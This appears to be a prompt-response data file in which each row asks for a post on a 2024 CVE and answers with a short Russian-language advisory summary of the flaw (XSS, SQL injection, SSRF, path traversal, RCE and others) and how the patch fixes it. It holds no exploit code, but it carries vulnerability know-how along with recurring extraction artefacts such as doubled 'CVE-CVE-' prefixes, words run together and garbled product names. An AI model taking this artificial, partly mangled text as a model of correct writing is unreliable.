| Write a post on the following topic,Уязвимость HTTP Request Smuggling в Twisted до версии 24.3.0,"CVE-CVE-2024-41671 ,выявленная вtwisted в версиях до 24.3.0, приводит кHTTP Request Smuggling. Уязвимость обусловлена недостатком в проверках при обработке заголовкаTrailerи символовEOL, которые могут содержаться во входящих http-запросах (см.source code),что позволяет внедрить вредоносный запрос в соединение и получить доступ к конфиденциальным данным. Висправлениибыли добавлены дополнительные проверки на превышение максимального размера заголовкаTrailerв условиях обработки символовEOL." |
| Write a post on the following topic,CVE-2024-37085: Authentication Bypass in VMware ESXi,"CVE-CVE-2024-37085 ,обнаруженная вVMware ESXi в версиях 8.0 Update 3, приводит кAuthentication Bypass. Проблема заключалась в возможности злоумышленника с определенным уровнем прав в Active Directory получить полный доступ к хосту с VMware ESXi, который ранее настроен на интеграцию с Active Directory, путем манипуляций с пользовательскими группами в домене. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Vulnerability CVE-2024-41677 leading to Cross-site Scripting (XSS) in qwik versions up to 1.6.0,"CVE-CVE-2024-41677 , обнаруженная вqwik в версиях до 1.6.0, приводит кCross-site Scripting (XSS). Проблема заключалась в возможности обхода функций санитизации данных пользовательского ввода (см.source code), что позволяло в некоторых случаях злоумышленнику выполнить произвольный JavaScript код. ВисправлениифункцииescapeHtmlиescapeAttrбыли объединены в одну общуюescapeHtmlдля санитизации пользовательского ввода независимо от его нахождения в тэгах или атрибутах." |
| Write a post on the following topic,Уязвимость Server-Side Template Injection в Shopware,"CVE-CVE-2024-42355 , выявленная вshopware в версиях до6.5.8.12, приводит кServer-Side Template Injection (SSTI). Уязвимость обусловлена помещением значения свойстваflagнапрямую в шаблон без обработки (см.source code), что позволяет внедрить в шаблон вредоносный исполняемый код. Висправлениибыл добавлен методstring()классаCompilerшаблонизатораtwigдля экранирования и безопасного добавления свойстваflagв шаблон." |
| Write a post on the following topic,Обнаружение уязвимости CSRF в Owncast из-за неправильной настройки политики CORS.,"CVE-CVE-2024-29026 , обнаруженная вOwncast в версиях 0.1.2, приводит кCross-Site Request Forgery (CSRF). Проблема заключалась в неправильной настройке политики CORS, в которой заголовокAccess-Control-Allow-Originзаполняется из запроса пользователя через заголовокOrigin(см.source code). ВисправлениисодержимоеAccess-Control-Allow-Originбыло установлено в значение""http://localhost:3000""." |
| Write a post on the following topic,SQL-Injection Vulnerability in Django Versions 5.0 to 5.0.7,"CVE-CVE-2024-42005 , выявленная вDjango в версиях с 5.0 до 5.0.7, приводит кSQL-Injection. Уязвимость обусловлена отсутствием обработки переменнойfields, в которую помещаются пользовательские значения псевдонимов столбцов (см.source code), что позволяет внедрить произвольный SQL код. Висправлениибыла добавлена обработка значений переменнойfieldsс помощью функцииcheck_alias, которая использует набор запрещенных символовFORBIDDEN_ALIAS_PATTERNдля валидации." |
| Write a post on the following topic,CVE-2024-20419: Ошибка контроля доступа в Cisco Smart Software Manager On-Prem,"CVE-CVE-2024-20419 , обнаруженная вCisco Smart Software Manager On-Prem в версиях 8-202206 и более ранних, приводит кBroken Access Control. Проблема заключалась в возможности злоумышленника без аутентификации сменить пароль любого пользователя, включая пользователей с правами администратора. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Уязвимость Path Traversal в webcrack до версии 2.14.1,"CVE-CVE-2024-43373 , выявленная вwebcrack в версиях до 2.14.1, приводит кPath Traversal. Уязвимость обусловлена использованием методовdirname(), join(), normalize()из модуляposixдля обработки путей файлов (см.source code), что позволяло перезаписывать произвольные файлы с расширением.jsна хостах сОС Windows. Висправленииметодыdirname(), join(), normalize()импортируются напрямую изnode:path, что позволяет унифицировать обработку путей для различных ОС." |
| Write a post on the following topic,Cross-Site Scripting (XSS) в trix до версии 2.1.4,"CVE-CVE-2024-43368 , обнаруженная вtrix в версиях до 2.1.4, приводит кCross-Site Scripting (XSS). Проблема заключалась в неправильной очистке контента, который пользователь вставляет в редактор, (см.source code), что позволяет злоумышленнику навязать пользователю вредоносныйJavaScriptкод, который выполнится в последующем. Висправлениибыл добавлен методsetHTML()классаHTMLSanitizer, который используется для санитизации всего контента, который помещается в редактор." |
| Write a post on the following topic,Уязвимость SQL Injection в ZoneMinder,"CVE-CVE-2024-43360 , обнаруженная вZoneMinder в версиях до 1.36.33 и 1.37.43, приводит кSQL Injection. Проблема заключалась в попадании внешних пользовательских данных через переменную$sortвSQL запрос(см.source code), что позволяло внедрить и выполнить произвольный SQL код. Висправлениибыл ограничен пул значений, которые может содержать переменная$sort." |
| Write a post on the following topic,Уязвимость SSRF в библиотеке axios,"CVE-CVE-2024-39338 , выявленная в библиотекеaxios в версиях с 1.3.2 по 1.7.3, приводит кServer-Side Request Forgery (SSRF). Уязвимость обусловлена небезопасным использованием классаURLдля разбора и обработки пользовательского ввода (см.source code), что позволяло осуществить подделку запросов. Висправлениилогика применения классаURLбыла изменена таким образом, что аргументbaseпри создании экземпляра класса теперь определяется динамически с помощьюOrigin." |
| Write a post on the following topic,Remote Code Execution vulnerability in ingress-nginx versions up to 1.11.2,"CVE-CVE-2024-7646 , обнаруженная вingress-nginx в версиях до 1.11.2, приводит кRemote Code Execution (RCE). Проблема заключалась в возможности внедрения произвольных команд в определенные аннотации, обходя предполагаемые проверки валидности, что позволит выполнять произвольный код на контроллере. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory. Висправлениибыла добавлена обработка символа\r." |
| Write a post on the following topic,"""SQL Injection vulnerability in sqlKvStore""","CVE-CVE-2024-43406 , обнаруженная вsqlKvStore в версиях до 1.14.2, приводит кSQL Injection. Проблема заключалась в возможности использовании пользовательских данных в SQL запросе (см.source code), что позволяло злоумышленнику внедрить и исполнить произвольный SQL код. Висправлениипроцесс формирования SQL запроса был изменен путем использования параметризации и методаdb.Prepare()." |
| Write a post on the following topic,Cross-Site Scripting (XSS) vulnerability in pretix versions up to 2024.7.1.,"CVE-CVE-2024-8113 , выявленная вpretix в версиях до 2024.7.1, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена включением данных о событиях в отображаемыйplaceholder(см.source code), что позволяло злоумышленнику вставлять HTML-теги в предварительные просмотры писем через процесс создания событий. Висправлениив процесс рендеринга был добавлен методescape()модуляdjango.utils.htmlкоторый позволяет экранировать опасные символы для HTML кода." |
| Write a post on the following topic,Path Traversal уязвимость в Mobile-Security-Framework-MobSF,"CVE-CVE-2024-43399 , обнаруженная вMobile-Security-Framework-MobSF в версиях до 4.0.7, приводит кPath Traversal. Проблема заключалась в обходе санитизации имен файлов для AR-архивов, которая была реализована с помощьюreplace()(см.source code), что позволяло злоумышленнику перезаписать существующие файлы или создать новые. Висправлениипроцесс обработки файлов в загружаемых архивах был изменен на использование внутреннего методаis_path_traversal(), который позволяет валидировать названия файлов." |
| Write a post on the following topic,Уязвимость Code Injection в Apache Dolphinscheduler,"CVE-CVE-2024-43202 , выявленная вApache Dolphinscheduler в версиях до 3.2.2, приводит кCode Injection. Уязвимость обусловлена опасным использованием классаYamlпри десериализации данных (см.source code), что позволяло внедрить и выполнить произвольный вредоносный код. Висправлениибыл добавлен классClassFilterConstructor, который позволяет валидировать имена классов при обработке." |
| Write a post on the following topic,Remote Code Execution vulnerability in Zabbix Server versions 6.4.0 to 6.4.15,"CVE-CVE-2024-22116 , обнаруженная вZabbix Server в версиях с 6.4.0 по 6.4.15приводит кRemote Code Execution (RCE). Проблема заключалась в отсутствии экранирования параметров скрипта Ping, что позволяло внедрить и выполнить произвольный код пользователю с ограниченными правами. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,XML External Entity (XXE) уязвимость в PHPSpreadsheet,"CVE-CVE-2024-45048 , обнаруженная вPHPSpreadsheet в версиях до 2.2.1, приводит кXML External Entity (XXE). Проблема заключалась в возможности обхода валидации поляencoding, который содержится в обрабатываемых данных в XML формате(см.source code), что позволяло злоумышленнику внедрять произвольные XML сущности. Висправлениипроцесс валидации был дополнен дополнительным шаблоном проверки поляencoding." |
| Write a post on the following topic,Уязвимость XSS в WebPack до версии 5.94.0,"CVE-CVE-2024-43788 , выявленная вWebpack в версиях до 5.94.0, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена в недостаточном контроле свойстваdocument.currentScript(см.source code), что позволяло злоумышленнику вставлять определенные HTML-теги с навязанными атрибутами. Висправлениибыл введен дополнительный контроль за свойствомdocument.currentScriptна принадлежность к тегу<script>." |
| Write a post on the following topic,Уязвимость Path Traversal в программе vOllama,"CVE-CVE-2024-45436 , обнаруженная вollama в версиях до 0.1.47, приводит кPath Traversal. Проблема заключалась в формировании имен файлов для записи из данных, которые содержались в загружаемых архивах (см.source code), что позволяло злоумышленнику перезаписывать произвольные файлы при распаковке архива. Висправлениибыла добавлена валидация имен файлов с помощью методаHasPrefix()." |
| Write a post on the following topic,Уязвимость CRLF Injection в RestSharp,"CVE-CVE-2024-45302 , выявленная вRestSharp в версиях с 107 по 112.0.0, приводит кCRLF Injection. Уязвимость обусловлена отсутствием проверки значения заголовков http-запросов на содержание в них символовCRLF(см.source code), что позволяло злоумышленнику эксплуатировать атакуhttp smugglingи, например, получить доступ к конфиденциальной информации. Висправлениибыла добавлена функцияIsInvalidHeaderStringдля проверки наличия специальных символов (\t, \r, \n) в значениях заголовков http-запросов." |
| Write a post on the following topic,Уязвимость в Jenkins позволяющая произвольное чтение файлов,"CVE-CVE-2024-43044 , обнаруженная вJenkins в версиях до 2.452.4(LTS) и 2.470,приводит кArbitrary File Reading. Проблема заключалась в возможности злоумышленникам с правами Agent/Connect читать произвольные файлы из файловой системы контроллера Jenkins. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,CVE-2024-43405: OS Command Injection in Nuclei versions 3.0.0 to 3.2.0,"CVE-CVE-2024-43405 , обнаруженная вNuclei в версиях с 3.0.0 по 3.2.0, приводит кOS Command Injecion. Проблема заключалась в неправильной обработке специальных символов при проверке подписей (см.source code), что позволяло внедрять произвольные системные команды через поле code. Висправлениибыл добавлен методExtractSignatureAndContent(), который позволяет корректно обрабатывать входные данные с помощью методаTrimSpace()." |
| Write a post on the following topic,Уязвимость Server-Side Template Injection (SSTI) в ethyca-fides.,"CVE-CVE-2024-45053 , выявленная вethyca-fides в версиях с 2.19.0 по 2.44.0, приводит кServer-Side Template Injection (SSTI). Уязвимость обусловлена попаданием пользовательского ввода в шаблоны, которые обрабатываются шаблонизатором Jinja (см.source code), что позволяло злоумышленнику выполнить произвольный код через внедрения в шаблон электронных писем. Висправленииразработчики отказались от шаблонизатора Jinja и стали использовать функциюreplace()для формирования шаблонов." |
| Write a post on the following topic,CVE-2024-42471: Arbitrary File Writing in actions/artifact,"CVE-CVE-2024-42471 , обнаруженная вactions/artifact в версиях с 2.0.0 по 2.1.7, приводит кArbitrary File Writing. Проблема заключалась в процессе обработки имен файлов при распаковке (см.source code), что позволяло перезаписывать произвольные файлы. Висправленииопасный метод обработки файлов в архиве был заменен на методunzip.Extract()." |
| Write a post on the following topic,Уязвимость XSS в Halo Project до версии 2.17.0,"CVE-CVE-2024-43792 , выявленная вHalo Project в версиях до 2.17.0, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена обработкой значений атрибутаsrcтеговiframeв редакторе (см.source code), что позволяло злоумышленнику выполнять вредоносные скрипты в пространстве пользователя. Висправлениибыл добавлен белый списокIS_ALLOWED_URIдля валидации значений атрибутаsrc." |
| Write a post on the following topic,Arbitrary Code Execution vulnerability in Kibana version 8.15.0 due to deserialization error in Amazon Bedrock Connector.,"CVE-CVE-2024-37288 , обнаруженная вKibana в версии 8.15.0приводит кArbitrary Code Execution. Проблема заключалась в возможности злоумышленникам выполнить произвольный код с помощью специального созданного документа в форматеYAMLиз-за ошибки десериализации вAmazon Bedrock Connector. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Server-Side Request Forgery (SSRF) vulnerability in litellm versions up to 1.44.8.,"CVE-CVE-2024-6587 , обнаруженная вlitellm в версиях до 1.44.8, приводит кServer-Side Request Forgery (SSRF). Проблема заключалась в возможности злоумышленнику подделать запрос и получить OpenAI API ключи через данные в теле входящих запросов (см.source code). Висправлениидобавлена функцияis_request_body_safe(), которая использует ""черный"" списокbanned_paramsдля валидации данных в теле входящих запросов." |
| Write a post on the following topic,Уязвимость CSRF в lunary из-за неправильной настройки политики CORS.,"CVE-CVE-2024-6862 , выявленная вlunary в версиях до 1.4.10, приводит кСross Site Request Forgery (CSRF). Уязвимость обусловлена неправильной настройкой политики CORS, которая включала в себя заголовокAccess-Control-Allow-Originсо значением*(см.source code), что позволяло злоумышленнику эксплуатировать произвольные экземплярыlunary. Висправлениинастройка политики CORS была скорректирована таким образом, что в режимеproductionзаголовокAccess-Control-Allow-Originзаполняется в из переменной окруженияAPP_URL." |
| Write a post on the following topic,Path Traversal в spring-framework версий 6.1.0-6.1.13,"CVE-CVE-2024-38816 , обнаруженная вspring-framework в версиях с 6.1.0 по 6.1.13, приводит кPath Traversal. Проблема заключалась в недостаточной валидации получаемых значений при обработке (см.source code), что позволяло злоумышленнику получить доступ к локальным файлам на хосте. Висправлениибыли добавлены дополнительные методы валидации и санитизации путей, используя функцииStringUtils.replace(),isInvalidEncodedInputPath(),cleanDuplicateSlashes()иcleanLeadingSlash()." |
| Write a post on the following topic,Уязвимость Prototype Pollution в dset до версии 3.1.4,"CVE-CVE-2024-21529 , выявленная вdset в версиях до 3.1.4, приводит кPrototype Pollution. Уязвимость обусловлена недостатком в процессе обработки значений ключей, который не учитывал работу с неявными типами (см.source code), что позволяло злоумышленнику выполнить обход проверок и ""загрязнить"" прототип. Висправлениипроцесс обработки значений был изменен таким образом, что все значения обрабатываемых ключей приводятся к типуstring" |
| Write a post on the following topic,SQL-инъекция в VICIdial версии 2.14-917a,"CVE-CVE-2024-8503 , обнаруженная вVICIdial в версии 2.14-917aприводит кSQL-injection. Проблема заключалась в отсутствии санитизации пользовательского ввода перед помещением данных в SQL-запрос типаINSERT, таким образом неаутентифицированный пользователь может выполнить произвольный SQL код. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,CVE-2024-45601 обнаружение и исправление Path Traversal в mesop,"CVE-CVE-2024-45601 , обнаруженная вmesop в версиях с 0.9.0 до 0.12.4, приводит кPath Traversal. Проблема заключалась в использованииos.path.join()с параметрами http-запроса при формировании пути к файлу (см.source code), что позволяло злоумышленнику получить доступ к произвольным файлам. Висправлениифункцияos.path.join()была заменена наsafe_join()для обеспечения безопасного процесса формирования путей к статическим файлам, также был добавлен ""белый"" список расширений для ограничения доступа к произвольным файлам." |
| Write a post on the following topic,Open Redirect уязвимость в Keycloak до версии 25.0.6,"CVE-CVE-2024-8883 , выявленная вKeycloak в версиях до 25.0.6, приводит кOpen Redirect. Уязвимость обусловлена использованием небезопасного метода поиска вхождения подстроки в строку для валидации пользовательского ввода (см.source code), что позволяло злоумышленнику обойти проверки и эксплуатировать открытое перенаправление, например, для раскрытия чувствительной информации. Висправлениидобавили проверку на допустимую схему (http) и на принадлежность адреса к ""белому"" списку адресов (LOOPBACK_INTERFACES)." |
| Write a post on the following topic,XML External Entity (XXE) vulnerability in DataEase,"CVE-CVE-2024-46985 , обнаруженная вDataEase до версии 2.10.1, приводит кXML External Entity (XXE). Проблема заключалась в отсутствии настроек безопасности парсера XML (см.source code), что позволяло подменить содержимое SVG файла и внедрить внешние сущности, например, для чтения произвольных файлов в файловой системе. Висправлениибыли добавлены настройки парсера для безопасной обработки SVG файлов, такие какdisallow-doctype-decl = true,load-external-dtd = false." |
| Write a post on the following topic,Server-Side Request Forgery (SSRF) в Lobe-chat,"CVE-CVE-2024-47066 , выявленная вLobe-chat в версиях до 1.19.13, приводит кServer-Side Request Forgery (SSRF). Проблема заключалась в недостатке внедренных методов проверки, которые не учитывают возможные перенаправления (см.source code), что позволяло выполнять подделку запросов для обращения к службам в внутренней сети и утечки конфиденциальной информации. Висправлениибыла переработана защита от подделки запросов, путем внедренияuseAgent()из библиотекиrequest-filtering-agent." |
| Write a post on the following topic,OS Command Injection в LoadMaster из-за отсутствия санитизации данных,"CVE-CVE-2024-7591 , обнаруженная вLoadMaster в версиях до7.2.60.0приводит кOS Command Injection. Проблема заключалась в отсутствии санитизации данных, что позволяло неаутентифицированному злоумышленнику с помощью http-запросов внедрить произвольные команды ОС и выполнить их. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Path Traversal Vulnerability in vagnai,"CVE-CVE-2024-47169 , обнаруженная вagnai в версиях до 1.0.330, приводит кPath Traversal. Проблема заключалась в недостаточной валидации, получаемых значений, при обработке (см.source code), что позволяло злоумышленнику перезаписывать произвольные файлы. Висправлениибыла добавлена валидация параметра_id, путем сравнения передаваемого значения с существующим идентификатором." |
| Write a post on the following topic,SQL-инъекция в Navidrome до версии 0.53.0,"CVE-CVE-2024-47062 , выявленная вNavidrome в версиях до 0.53.0, приводит кSQL-injection. Уязвимость обусловлена тем, что параметры помещаются в SQL запросы, что позволяло злоумышленнику выполнить произвольный SQL код. Висправлениибыло добавлены механизмы для надежной и безопасной обработки SQL такие как: внедрение обработки контекстаctxпри анализе параметров, использование методаregisterModel()для сопоставления фильтров и моделей." |
| Write a post on the following topic,Cross-Site Scripting vulnerability in Filament versions 3.0.0 to 3.2.115,"CVE-CVE-2024-47186 , обнаруженная вFilament в версиях с 3.0.0 по 3.2.115, приводит кCross-Site Scripting. Проблема заключалась в том, что значенияColorColumnиColumnEntryне проходили санитизацию во время помещения значений в шаблон (см.source code), что позволяло внедрить произвольныйjavascriptкод, который выполнится при отображении. Висправлениибыла добавлена функцияe()для санитизации значенийColorColumnиColumnEntryв шаблоне." |
| Write a post on the following topic,Уязвимость Prototype Pollution в DOMPurify,"CVE-CVE-2024-45801 , выявленная вdompurify в версиях до 2.5.4 и 3.1.3, приводит кPrototype Pollution. Уязвимость обусловлена недостатком в процессе проверки уровней вложенности, который не учитывал использование специальныхметодов вложенности (см.source code), что позволяло злоумышленнику обходить проверки и выполнить произвольныйjavascriptкод. Висправлениипроцесс был дополнен проверкой значения количества уровней вложенности с помощьюNumber.isNaN(), что позволит правильно обрабатывать конструкции, в которых нельзя определить уровень вложенности." |
| Write a post on the following topic,Insecure Deserialization in WordPress GiveWP Plugin (CVE-2024-8353),"CVE-CVE-2024-8353 , обнаруженная вплагине WordPress GiveWPприводит кInsecure Deserialization. Проблема заключалась в возможности неаутентифицированного злоумышленника внедрять PHP-объект и, например, совершать различные действия с произвольными файлами или удаленно выполнять произвольный код. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Path Traversal уязвимость в idurar-erp-crm,"CVE-CVE-2024-47769 , обнаруженная вidurar-erp-crm в версиях до 2.1.0, приводит кPath Traversal. Проблема заключалась в использовании параметров из запроса для формирования пути к файлу с использованием функцииpath.join()(см.source code). Висправлениизначение параметраsubPathзапроса перед использованием нормализуют (path.normalize()) и очищают от символов обхода директории c использованием регулярного выражение^(\.\.[\/\\])+." |
| Write a post on the following topic,CVE-2024-47523: Cross-Site Scripting (XSS) vulnerability in LibreNMS versions up to 24.9.0,"CVE-CVE-2024-47523 , выявленная вLibreNMS в версиях до 24.9.0, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена использованием значения$instance->displayDetailsпри отображении (см.source code)html-кода, что позволяло злоумышленнику внедрять и сохранять произвольныйJavaScriptкод. Висправлениибыла добавлена функцияhtmlentities()для санитизации значения$instance->displayDetails" |
| Write a post on the following topic,XXE vulnerability in PhpSpreadsheet versions due to improper regex in XML encoding detection,"CVE-CVE-2024-45293 , обнаруженная вPhpSpreadsheet в версиях до 1.29.1, с 2.0.0 по 2.1.1 и с 2.2.0 по 2.3.0, приводит кXML External Entity (XXE). Проблема заключалась в некорректных регулярных выражениях, которые используются для определения кодировки передаваемого XML-файла (см.source code), что позволяло злоумышленнику обходить проверку с помощью пробелов и внедрять произвольные сущности. Висправлениирегулярные выражения были дополнены с учетом возможного наличия пробеловencoding\\s*=\\s*""([^""]*]?)""" |
| Write a post on the following topic,Prototype Pollution вUplot из-за контроля за свойством __proto__,"CVE-CVE-2024-21489 , выявленная вUplot в версиях до 1.6.31, приводит кPrototype Pollution. Уязвимость обусловлена отсутствием контроля за свойством__proto__в функцииuplot.assign()(см.source code), что позволяло злоумышленнику ""загрязнить"" прототип. Висправлениибыл добавлен контроль за свойством__proto__с помощью логических конструкций и сравнения значения." |
| Write a post on the following topic,Unauthenticated Signature Forgery in Ruby-SAML,"CVE-CVE-2024-45409 , обнаруженная вRuby-SAML в версиях до 1.12.3, с 1.13.0 до 1.17.0приводит кUnauthenticated Signature Forgery. Проблема заключалась в некорректном доступе к элементам с использованием//селектораXPath, что позволяет злоумышленнику без аутентификации подделатьSAMLResponseи войти в систему под любым пользователем. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory. Подробное описание уязвимости приводится встатьеот командыProjectDiscovery." |
| Write a post on the following topic,Обнаружение уязвимости Arbitrary File Upload в Livewire,"CVE-CVE-2024-47823 , обнаруженная вlivewire в версиях до 2.12.7 и 3.5.2, приводит кArbitrary File Upload. Проблема заключалась в логике определения расширения файла по MIME (см.source code), что позволяло загружать произвольные файлы. ВисправлениифункцияguessExtension(), которая определяет расширение файлов по MIME, была заменена на функциюgetClientOriginalExtension(), которая определяет расширение из имени файла." |
| Write a post on the following topic,Уязвимость Cross-Site Scripting (XSS) в astro версиях с 3.0.0 по 4.16.0.,"CVE-CVE-2024-47885 , выявленная вastro в версиях с 3.0.0 по 4.16.0, приводит кCross-Site Scripting (XSS). Уязвимость заключалась в неправильном использовании свойстваdocument.scriptsдля осуществления контроля (см.source code), что позволяло злоумышленнику вставлять определенные HTML-теги с навязанными атрибутами. Висправлениииспользование свойстваdocument.scriptsбыло заменено наdocument.getElementsByTagName('script')." |
| Write a post on the following topic,Уязвимость XXE в xmlgraphics-fop до версии 2.9,"CVE-CVE-2024-28168 , обнаруженная вxmlgraphics-fop в версиях до 2.9, приводит кXML External Entity (XXE). Проблема заключалась в отсутствии настройки безопасности обработчика (см.source code), что позволяло внедрять произвольные сущности в передаваемом XML. Висправлениибыла добавлена настройкаXMLConstants.FEATURE_SECURE_PROCESSINGсо значениемtrue, которая позволяет включить безопасный процесс обработки XML." |
| Write a post on the following topic,Уязвимость Remote Code Execution в библиотеке jsonpath-plus,"CVE-CVE-2024-21534 , выявленная вjsonpath-plus в версиях до 10.0.0, приводит кRemote Code Execution (RCE). Уязвимость обусловлена небезопасным использованием модуляnode:vmдля анализа выражений, что позволяло злоумышленнику внедрить вредоносный код и выполнить его в контексте приложения. Висправлениибыл переработан процесс использования модуляnode:vm, также была скорректирована проверка свойств объектов." |
| Write a post on the following topic,Path Traversal Vulnerability in Ivanti CSA,"CVE-CVE-2024-8963 , обнаруженная вIvanti CSA в версиях до 4.6приводит кPath Traversal. Проблема заключалась в возможности злоумышленника, которые не прошел аутентификацию, получить доступ к функциям с ограниченным доступом. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Path Traversal в vendure/asset-server-plugin,"CVE-CVE-2024-48914 , обнаруженная вvendure/asset-server-plugin в версиях до 2.3.3 и 3.0.5, приводит кPath Traversal. Проблема заключалась в попадании пользовательских данных после их обработки с помощью функцииdecodedReqPath()непосредственно вpath.join()(см.source code), что позволяло злоумышленнику получить доступ к произвольным файлам на хосте. Висправлениибыл добавлен методsanitizeFilePath(), в котором пользовательский ввод нормализуется (path.normalize()) и санитизируется с использованием регулярного выражения(\.\.[\/\\])+) ." |
| Write a post on the following topic,Уязвимость Denial of Service в Starlette из-за неограниченного размера multipart/form-data,"CVE-CVE-2024-47874 , выявленная вstarlette в версиях до 0.39.2, приводит кDenial of Service (DoS). Уязвимость обусловлена сохранением результатов обработки частейmultipart/form-dataв буфер без каких-либо ограничений по размеру (см.source code), что позволяло злоумышленнику загружать произвольные большие поля формы. Висправлениибыло введено ограничение на максимальный размер передаваемых частей (max_part_size), при превышении которого срабатывает исключениеMultiPartException." |
| Write a post on the following topic,"""Cross-Site Scripting vulnerability in markdown-to-jsx""","CVE-CVE-2024-21535 , обнаруженная вmarkdown-to-jsx в версиях до 7.4.0, приводит кCross-Site Scripting (XSS). Проблема заключалась в отсутствии контроля за атрибутомsrcв процессе санитизации (см.source code), что позволяло злоумышленнику внедрить произвольныйJavaScriptкод через элементiframeвmarkdown. Висправлениибыл добавлен контроль за атрибутомsrcтэгаiframeс помощью введения нового контроля." |
| Write a post on the following topic,Уязвимость приводящая к Race Conditions в gradio,"CVE-CVE-2024-47870 , выявленная вgradio в версиях до 5.0.0, приводит кRace Conditions. Уязвимость обусловлена возможностью изменения конфигурации в многопоточном режиме работы (см.source code), что позволяло злоумышленнику перенаправить пользовательский трафик на вредоносный сервер. Висправлениибыла добавлена функцияsafe_deepcopy()для обеспечения защиты от параллельного изменения конфигурации." |
| Write a post on the following topic,SQL Injection vulnerability in Grafana versions 11.0.0 to 11.0.5,"CVE-CVE-2024-9264 , обнаруженная вGrafana в версии с 11.0.0 по 11.0.5приводит кSQL Injection. Проблема заключалась в возможности любого аутентифицированного пользователя с правамиVIEWERи выше внедрить произвольный код вSQLзапрос и, например, прочитать произвольные файлы на хосте. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Уязвимость Remote Code Execution в OpenRefine через загрузку DLL,"CVE-CVE-2024-47881 , обнаруженная вOpenRefine в версиях с 3.4 до 3.8.3, приводит кRemote Code Execution. Проблема заключалась в возможности загрузки DLL через манипулирование именем базы данных в методеgetDatabaseUrl()(см.source code), что позволяло злоумышленнику подгружать DLL файлы и исполнять произвольный код. Висправлениибыли добавлены методы контроля имени БД и дополнительные настройки ограничения режима доступа (read-only)." |
| Write a post on the following topic,Уязвимость Path Traversal в Werkzeug до версии 3.0.5 из-за обработки UNC путей.,"CVE-CVE-2024-49766 , выявленная вWerkzeug в версиях до 3.0.5, приводит кPath Traversal. Уязвимость обусловлена отсутствием обработки UNC путей в методеsafe_join()при использовании функцииos.path.isabs()из версии Python < 3.11 (см.source code), что позволяло злоумышленнику выполнить обход пути в ОС Windows. Висправлениибыла добавлена проверкаfilename.startswith(""/"")для контроля UNC пути." |
| Write a post on the following topic,OS Command Injection vulnerability in Snyk PHP CLI Plugin,"CVE-CVE-2024-48963 , обнаруженная вSnyk PHP CLI Plugin в версиях до 1.10.0, приводит кOS Command Injection. Проблема заключалась в прямом попадании недоверенных данных в результирующую строку, которая передавалась в методchildProcess.spawnSync()(см.source code) что позволяло внедрить команды ОС используя пути к сканируемым файлам. Висправленииметод формирования аргументов, передаваемых в методchildProcess.spawnSync(), был заменен на использование параметризированного подхода" |
| Write a post on the following topic,Remote Code Execution в модуле pyload-ng,"CVE-CVE-2024-47821 , выявленная в модулеpyload-ng в версии 0.5.0, приводит кRemote Code Execution (RCE). Уязвимость обусловлена наличием возможности использования системных путей для хранения пользовательских файлов, что могло потенциально привести к выполнению произвольного кода после загрузки файла. Висправлениибыли введены проверки на разрешенные пути для каталога хранения загружаемых файлов." |
| Write a post on the following topic,Authentication Bypass in Comments-wpdiscuz Plugin for WordPress,"CVE-CVE-2024-9488 , обнаруженная в плагинеComments-wpdiscuz для WordPress в версиях до 7.6.25,приводит кAuthentication Bypass. Проблема заключалась в недостаточной проверке пользователей, которые использовали возможность аутентификации с помощьюsocial login token, что позволяло неавторизированному злоумышленнику войти под видом любого пользователя, в том числе и под видом пользователей с правами администратора. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Уязвимость Path Traversal в changedetection.io,"CVE-CVE-2024-51483 , выявленная вchangedetection.ioв версиях до 0.47.05, приводит кPath Traversal. Причиной уязвимости является обход контроля использования схемыfile://при доступе к файлам, с помощью добавленияsource:к полезной нагрузке. Висправлениибыли добавлены дополнительные проверки сочетанийsource:иfile://с использованием функцийis_safe_url()иre.search()." |
| Write a post on the following topic,SQL-Injection в ZoneMinder версии 1.37 до 1.37.64.,"CVE-CVE-2024-51482 , обнаруженная вzoneminder в версиях с 1.37 по 1.37.64, приводит кSQL-Injection. Проблема заключалась в попадании пользовательских данных через параметрtidнапрямую в SQL запрос (см.source code). Висправлениибыла добавлена обработка параметраtidс помощью методаvalidCardinal(), который проверяет на целочисленные значения, и формирование SQL запроса стало выполняться с помощью параметризации." |
| Write a post on the following topic,Уязвимость Arbitrary File Writing в Plenti,"CVE-CVE-2024-49380 , выявленная вPlenti в версиях до 0.7.2, приводит кArbitrary File Writing. Уязвимость обусловлена отсутствием ограничений каталогов, в которых можно производить запись (см.source code), что позволяло злоумышленнику записать содержимое в произвольные файлы. Висправлениибыла скорректирована функция формирования пути к файлу через использование текущей директории (os.Getwd()) и санитизации названий файлов (filepath.Clean())." |
| Write a post on the following topic,Prototype Pollution уязвимость в dompurify до версии 2.4.2,"CVE-CVE-2024-48910 , обнаруженная вdompurify в версиях до 2.4.2, приводит кPrototype Pollution. Проблема заключалась в возможности злоумышленника влиять на свойства объекта через загрязнение прототипа, от которого он создан (см.source code), что позволяло злоумышленнику, например, изменять списки разрешенных атрибутов и внедрять произвольный JavaScript код, тем самым выполняя обход функцииsanitize(). Висправлениив условие проверки возвращаемого значения функцииhasOwnProperty()было добавлено строгое равенство через оператор '===' наtrue." |
